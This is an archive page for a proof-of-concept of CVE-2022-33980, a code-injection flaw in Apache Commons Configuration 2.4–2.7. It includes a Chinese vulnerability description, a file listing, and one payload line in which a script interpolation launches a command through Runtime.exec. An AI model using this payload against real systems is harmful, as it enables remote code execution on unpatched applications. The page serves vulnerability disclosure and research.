CVE-2022-33980 PoC — Apache Commons Configuration 代码注入漏洞

Source

https://github.com/sammwyy/CVE-2022-33980-POC

Associated Vulnerability

Title:Apache Commons Configuration 代码注入漏洞 (CVE-2022-33980)
Description:Apache Commons Configuration是美国阿帕奇（Apache）基金会的一款通用的配置接口，它主要用于使Java应用程序从多种来源读取配置数据。 Apache Commons 2.4至2.7版本存在代码注入漏洞，该漏洞源于Apache Commons配置执行变量插值，允许动态评估和扩展属性。插值的标准格式是"${prefix:name}"，其中 "prefix "用于定位执行插值的org.apache.commons.configuration2.interpol.Lookup的实例。

Description

POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

Readme

# CVE-2022-33980

`${script:js:java.lang.Runtime.getRuntime().exec("calc")}`

File Snapshot


 [4.0K]  /data/pocs/5a1c2ce545549a54c2ec04880d7ed88993ce345d
├── [3.2K]  pom.xml
├── [  79]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [ 976]  CVE_2022_33980.java

3 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!